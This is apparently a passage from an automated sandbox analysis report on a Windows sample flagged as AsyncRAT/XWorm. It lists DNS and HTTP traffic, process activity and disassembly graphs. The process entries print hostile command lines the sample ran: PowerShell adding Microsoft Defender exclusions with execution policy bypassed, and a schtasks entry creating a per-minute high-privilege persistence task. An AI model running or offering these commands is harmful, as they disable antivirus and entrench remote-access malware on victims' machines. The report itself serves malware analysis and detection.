                                                                    Jan 1, 2025 21:57:59.128092051 CET53560861.1.1.1192.168.2.5
                                                                    Jan 1, 2025 21:59:04.270114899 CET6355553192.168.2.51.1.1.1
                                                                    Jan 1, 2025 21:59:04.312227964 CET53635551.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 1, 2025 21:57:59.121339083 CET192.168.2.51.1.1.10x2d6aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                    Jan 1, 2025 21:59:04.270114899 CET192.168.2.51.1.1.10x13c1Standard query (0)drive-isp.gl.at.plly.ggA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 1, 2025 21:57:59.128092051 CET1.1.1.1192.168.2.50x2d6aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                    Jan 1, 2025 21:59:04.312227964 CET1.1.1.1192.168.2.50x13c1Name error (3)drive-isp.gl.at.plly.ggnonenoneA (IP address)IN (0x0001)false
                                                                    • ip-api.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549704208.95.112.180728C:\Users\user\Desktop\kj93GnZHBS.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 1, 2025 21:57:59.139360905 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                    Host: ip-api.com
                                                                    Connection: Keep-Alive
                                                                    Jan 1, 2025 21:57:59.622014999 CET175INHTTP/1.1 200 OK
                                                                    Date: Wed, 01 Jan 2025 20:57:59 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 6
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 60
                                                                    X-Rl: 44
                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                    Data Ascii: false


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:15:57:54
                                                                    Start date:01/01/2025
                                                                    Path:C:\Users\user\Desktop\kj93GnZHBS.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\kj93GnZHBS.exe"
                                                                    Imagebase:0x410000
                                                                    File size:42'496 bytes
                                                                    MD5 hash:0B489846AD1A6A399EC787E157FD0970
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:2
                                                                    Start time:15:57:59
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:15:57:59
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:15:58:07
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'kj93GnZHBS.exe'
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:15:58:07
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:15:58:20
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log'
                                                                    Imagebase:0x7ff6068e0000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:15:58:20
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:15:58:39
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system log'
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:15:58:39
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:15:59:03
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log"
                                                                    Imagebase:0x7ff6802e0000
                                                                    File size:235'008 bytes
                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:15:59:03
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:15:59:03
                                                                    Start date:01/01/2025
                                                                    Path:C:\Users\user\AppData\Local\Temp\system log
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\system log"
                                                                    Imagebase:0xc0000
                                                                    File size:42'496 bytes
                                                                    MD5 hash:0B489846AD1A6A399EC787E157FD0970
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Joe Security
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Joe Security
                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\system log, Author: Sekoia.io
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\system log, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 82%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:15:59:13
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\OpenWith.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                    Imagebase:0x7ff7c9640000
                                                                    File size:123'984 bytes
                                                                    MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:15:59:14
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:18
                                                                    Start time:15:59:21
                                                                    Start date:01/01/2025
                                                                    Path:C:\Windows\System32\OpenWith.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                    Imagebase:0x7ff7c9640000
                                                                    File size:123'984 bytes
                                                                    MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:21.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:8.3%
                                                                      Total number of Nodes:36
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 3209 7ff848e6925c 3210 7ff848e69261 RtlSetProcessIsCritical 3209->3210 3212 7ff848e69352 3210->3212 3167 7ff848e6a798 3168 7ff848e6a796 3167->3168 3168->3167 3173 7ff848e69278 3168->3173 3172 7ff848e6ab69 3174 7ff848e69281 RtlSetProcessIsCritical 3173->3174 3176 7ff848e69352 3174->3176 3176->3172 3177 7ff848e69288 3176->3177 3178 7ff848e69291 3177->3178 3179 7ff848e692f2 RtlSetProcessIsCritical 3178->3179 3180 7ff848e69352 3179->3180 3180->3172 3181 7ff848e69798 3182 7ff848e697a1 SetWindowsHookExW 3181->3182 3184 7ff848e69871 3182->3184 3185 7ff848e695a5 3186 7ff848e695bf 3185->3186 3187 7ff848e695d1 3186->3187 3189 7ff848e68730 3186->3189 3192 7ff848e68735 3189->3192 3193 7ff848e69258 3192->3193 3194 7ff848e69261 RtlSetProcessIsCritical 3193->3194 3196 7ff848e69352 3194->3196 3196->3187 3163 7ff848e67631 3164 7ff848e6764f CheckRemoteDebuggerPresent 3163->3164 3166 7ff848e676ef 3164->3166 3197 7ff848e67740 3198 7ff848e67749 3197->3198 3201 7ff848e67200 3198->3201 3202 7ff848e671c8 CheckRemoteDebuggerPresent 3201->3202 3204 7ff848e676ef 3202->3204 3205 7ff848e6a090 3208 7ff848e6a099 3205->3208 3206 7ff848e69258 RtlSetProcessIsCritical 3207 7ff848e6a578 3206->3207 3208->3206

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: O_H
                                                                      • API String ID: 0-1880849852
                                                                      • Opcode ID: 579dcb6c6749fe3d06d7a4046c5ce8d44e8ec77c211a9b9224ea1fb988a35c5b
                                                                      • Instruction ID: 61ea016f21a9e19f1cae49c543e104e4ef341c0366f3038a57fb76da139fdcc5
                                                                      • Opcode Fuzzy Hash: 579dcb6c6749fe3d06d7a4046c5ce8d44e8ec77c211a9b9224ea1fb988a35c5b
                                                                      • Instruction Fuzzy Hash: AB02E160B2CE465FE798FB3C849527AB7D2FF98780F584579D04ED3282DE38A8418746

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 183 7ff848e67200-7ff848e67218 185 7ff848e671c8-7ff848e671cb 183->185 186 7ff848e6721a-7ff848e6722f 183->186 188 7ff848e67650-7ff848e676ed CheckRemoteDebuggerPresent 185->188 186->188 192 7ff848e676ef 188->192 193 7ff848e676f5-7ff848e67738 188->193 192->193
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea7a4662f2c88ef35e75c8331033e86f2bb347cb7064b0e4c48ee109742c287a
                                                                      • Instruction ID: 828668bc8a3e1c4fdecc11ddd296b50b5a61e36382e07c01e73c3b6e50b05611
                                                                      • Opcode Fuzzy Hash: ea7a4662f2c88ef35e75c8331033e86f2bb347cb7064b0e4c48ee109742c287a
                                                                      • Instruction Fuzzy Hash: 41412371D0DA588FDB59EF5C88467F9BBE0FF65311F08026BD089D3182DB74A8468791

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 356 7ff848e65c76-7ff848e65c83 357 7ff848e65c8e-7ff848e65d57 356->357 358 7ff848e65c85-7ff848e65c8d 356->358 362 7ff848e65d59-7ff848e65d62 357->362 363 7ff848e65dc3 357->363 358->357 362->363 364 7ff848e65d64-7ff848e65d70 362->364 365 7ff848e65dc5-7ff848e65dea 363->365 366 7ff848e65da9-7ff848e65dc1 364->366 367 7ff848e65d72-7ff848e65d84 364->367 371 7ff848e65dec-7ff848e65df5 365->371 372 7ff848e65e56 365->372 366->365 369 7ff848e65d88-7ff848e65d9b 367->369 370 7ff848e65d86 367->370 369->369 373 7ff848e65d9d-7ff848e65da5 369->373 370->369 371->372 374 7ff848e65df7-7ff848e65e03 371->374 375 7ff848e65e58-7ff848e65f00 372->375 373->366 376 7ff848e65e3c-7ff848e65e54 374->376 377 7ff848e65e05-7ff848e65e17 374->377 386 7ff848e65f6e 375->386 387 7ff848e65f02-7ff848e65f0c 375->387 376->375 378 7ff848e65e19 377->378 379 7ff848e65e1b-7ff848e65e2e 377->379 378->379 379->379 381 7ff848e65e30-7ff848e65e38 379->381 381->376 389 7ff848e65f70-7ff848e65f99 386->389 387->386 388 7ff848e65f0e-7ff848e65f1b 387->388 390 7ff848e65f1d-7ff848e65f2f 388->390 391 7ff848e65f54-7ff848e65f6c 388->391 396 7ff848e65f9b-7ff848e65fa6 389->396 397 7ff848e66003 389->397 392 7ff848e65f31 390->392 393 7ff848e65f33-7ff848e65f46 390->393 391->389 392->393 393->393 395 7ff848e65f48-7ff848e65f50 393->395 395->391 396->397 399 7ff848e65fa8-7ff848e65fb6 396->399 398 7ff848e66005-7ff848e66096 397->398 407 7ff848e6609c-7ff848e660ab 398->407 400 7ff848e65fef-7ff848e66001 399->400 401 7ff848e65fb8-7ff848e65fca 399->401 400->398 402 7ff848e65fcc 401->402 403 7ff848e65fce-7ff848e65fe1 401->403 402->403 403->403 405 7ff848e65fe3-7ff848e65feb 403->405 405->400 408 7ff848e660ad 407->408 409 7ff848e660b3-7ff848e66118 call 7ff848e66134 407->409 408->409 416 7ff848e6611f-7ff848e66133 409->416 417 7ff848e6611a 409->417 417->416
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dfd0242632b78b96e258326a4db273ed468cded556583bccfc4fa2c08ec59893
                                                                      • Instruction ID: 742d85247f85d179790ff2c2456c18d803633d02910e85ccd9f889e20eed9126
                                                                      • Opcode Fuzzy Hash: dfd0242632b78b96e258326a4db273ed468cded556583bccfc4fa2c08ec59893
                                                                      • Instruction Fuzzy Hash: 97F1B530A1CA4E8FEBA8EF28C8557E937D1FF64350F44426EE84DC7295DB34A9458B81

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 7ff848e66a22-7ff848e66a2f 534 7ff848e66a3a-7ff848e66b07 533->534 535 7ff848e66a31-7ff848e66a39 533->535 539 7ff848e66b09-7ff848e66b12 534->539 540 7ff848e66b73 534->540 535->534 539->540 541 7ff848e66b14-7ff848e66b20 539->541 542 7ff848e66b75-7ff848e66b9a 540->542 543 7ff848e66b59-7ff848e66b71 541->543 544 7ff848e66b22-7ff848e66b34 541->544 549 7ff848e66b9c-7ff848e66ba5 542->549 550 7ff848e66c06 542->550 543->542 545 7ff848e66b38-7ff848e66b4b 544->545 546 7ff848e66b36 544->546 545->545 548 7ff848e66b4d-7ff848e66b55 545->548 546->545 548->543 549->550 552 7ff848e66ba7-7ff848e66bb3 549->552 551 7ff848e66c08-7ff848e66c2d 550->551 559 7ff848e66c2f-7ff848e66c39 551->559 560 7ff848e66c9b 551->560 553 7ff848e66bec-7ff848e66c04 552->553 554 7ff848e66bb5-7ff848e66bc7 552->554 553->551 556 7ff848e66bc9 554->556 557 7ff848e66bcb-7ff848e66bde 554->557 556->557 557->557 558 7ff848e66be0-7ff848e66be8 557->558 558->553 559->560 561 7ff848e66c3b-7ff848e66c48 559->561 562 7ff848e66c9d-7ff848e66ccb 560->562 563 7ff848e66c4a-7ff848e66c5c 561->563 564 7ff848e66c81-7ff848e66c99 561->564 568 7ff848e66ccd-7ff848e66cd8 562->568 569 7ff848e66d3b 562->569 566 7ff848e66c5e 563->566 567 7ff848e66c60-7ff848e66c73 563->567 564->562 566->567 567->567 570 7ff848e66c75-7ff848e66c7d 567->570 568->569 571 7ff848e66cda-7ff848e66ce8 568->571 572 7ff848e66d3d-7ff848e66e15 569->572 570->564 573 7ff848e66cea-7ff848e66cfc 571->573 574 7ff848e66d21-7ff848e66d39 571->574 582 7ff848e66e1b-7ff848e66e2a 572->582 575 7ff848e66cfe 573->575 576 7ff848e66d00-7ff848e66d13 573->576 574->572 575->576 576->576 578 7ff848e66d15-7ff848e66d1d 576->578 578->574 583 7ff848e66e2c 582->583 584 7ff848e66e32-7ff848e66e94 call 7ff848e66eb0 582->584 583->584 591 7ff848e66e9b-7ff848e66eaf 584->591 592 7ff848e66e96 584->592 592->591
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d586edd6f2d752a1ead3d4fd8934ea405a70acb399765cbeec7179bcc2ebd27d
                                                                      • Instruction ID: ba445ceffbd14c20f7578c283a57e450d4b96f9dc5b5a83884a38fc3d1347cfb
                                                                      • Opcode Fuzzy Hash: d586edd6f2d752a1ead3d4fd8934ea405a70acb399765cbeec7179bcc2ebd27d
                                                                      • Instruction Fuzzy Hash: 17E1C23091CA4E8FEBA8EF28C8557E977E1FB54350F44426EE80DD72A1CF74A9448B85
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9eb1852141ccdbf6155210c620a610900e7c515bebdadfb514a858ed84b9d04d
                                                                      • Instruction ID: f9390d37d43e8c40479b60fff113ab316d5b5f0f11e13224347d898ea3972a44
                                                                      • Opcode Fuzzy Hash: 9eb1852141ccdbf6155210c620a610900e7c515bebdadfb514a858ed84b9d04d
                                                                      • Instruction Fuzzy Hash: F6C18B20F1D94A5FEB98FB3884552B976D2FF98381F44417AD45EE3293DF38A8028746
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef714e1759ff2aad523d820ce1cd708eb15e098993d82502921a2360194a0f8f
                                                                      • Instruction ID: 95a7844f89c84fbfb380fc2616de10d4c3833c6dafdbdeb5fe4666c73cc61ceb
                                                                      • Opcode Fuzzy Hash: ef714e1759ff2aad523d820ce1cd708eb15e098993d82502921a2360194a0f8f
                                                                      • Instruction Fuzzy Hash: 6C510520A1E6C95FD787A7385864276BFD5EF97256F0800FBE089C71D3DE285806C346

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 159 7ff848e69258-7ff848e69350 RtlSetProcessIsCritical 168 7ff848e69358-7ff848e6938d 159->168 169 7ff848e69352 159->169 169->168
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      • Opcode ID: a18a476fe88877d621bc6ba0b814adee41d9e56dfee2aa831481f79b9620e0cb
                                                                      • Instruction ID: b1df16f0039e0e8a5ee0b19e18be54c57626c0f08595a6c43c721078bf2d17d6
                                                                      • Opcode Fuzzy Hash: a18a476fe88877d621bc6ba0b814adee41d9e56dfee2aa831481f79b9620e0cb
                                                                      • Instruction Fuzzy Hash: 4841E27180DA898FDB29EB6898456F9BBE0FF56311F08016ED08AD7193DB346845CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 171 7ff848e6925c-7ff848e692ea 179 7ff848e692f2-7ff848e69350 RtlSetProcessIsCritical 171->179 180 7ff848e69358-7ff848e6938d 179->180 181 7ff848e69352 179->181 181->180
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      • Opcode ID: 1c2654ca38260705cdd03dda09f8117c862a144b04705d425577cddaa76641b6
                                                                      • Instruction ID: 6e2172ee0199fd7c6e45cd2b6e36a989992f0d307e105d96571f4b4d32622700
                                                                      • Opcode Fuzzy Hash: 1c2654ca38260705cdd03dda09f8117c862a144b04705d425577cddaa76641b6
                                                                      • Instruction Fuzzy Hash: C441D371C0DA898FDB29EB6898456F9BBE0FF56311F08016ED08AD7193DB346845CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 195 7ff848e69798-7ff848e6979f 196 7ff848e697aa-7ff848e697b9 195->196 197 7ff848e697a1-7ff848e697a4 195->197 198 7ff848e697bb-7ff848e6981d 196->198 199 7ff848e697a9 196->199 197->199 203 7ff848e698a9-7ff848e698ad 198->203 204 7ff848e69823-7ff848e69830 198->204 199->196 205 7ff848e69832-7ff848e6986f SetWindowsHookExW 203->205 204->205 207 7ff848e69877-7ff848e698a8 205->207 208 7ff848e69871 205->208 208->207
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: c704343ff89508dc9b4d3e66c8c7a25e1e3873148aeb458e2fdeb97e9a1cee9a
                                                                      • Instruction ID: 61e94562c0e52b367e70828e621881a1bb9e2662e61a6d31f2d45773feeb1716
                                                                      • Opcode Fuzzy Hash: c704343ff89508dc9b4d3e66c8c7a25e1e3873148aeb458e2fdeb97e9a1cee9a
                                                                      • Instruction Fuzzy Hash: E3411630A0CA4C8FDB19EF6898466F9BBE1FB59321F00023ED049D3292CB75B81287C1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 211 7ff848e69278-7ff848e69350 RtlSetProcessIsCritical 217 7ff848e69358-7ff848e6938d 211->217 218 7ff848e69352 211->218 218->217
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3283780131.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_kj93GnZHBS.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      • Opcode ID: f8d192475dbc3d1adcf311015c96fdaa9560de594b2d55d5ad90a3d01b032dea
                                                                      • Instruction ID: 7f0479deb8f1e3e30015d53c1924c99b831dae2c3e7631e4e0ecf342c8ecc7c7
                                                                      • Opcode Fuzzy Hash: f8d192475dbc3d1adcf311015c96fdaa9560de594b2d55d5ad90a3d01b032dea
                                                                      • Instruction Fuzzy Hash: 7941E33190CA488FDB29EFACD8456F9BBE0FF55311F14012EE08AD3292DB746846CB91

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 227 7ff848e69288-7ff848e692ea 231 7ff848e692f2-7ff848e69350 RtlSetProcessIsCritical 227->231 232 7ff848e69358-7ff848e6938d 231->232 233 7ff848e69352 231->233 233->232
                                                                      APIs
                                                                      Memory Dump Source
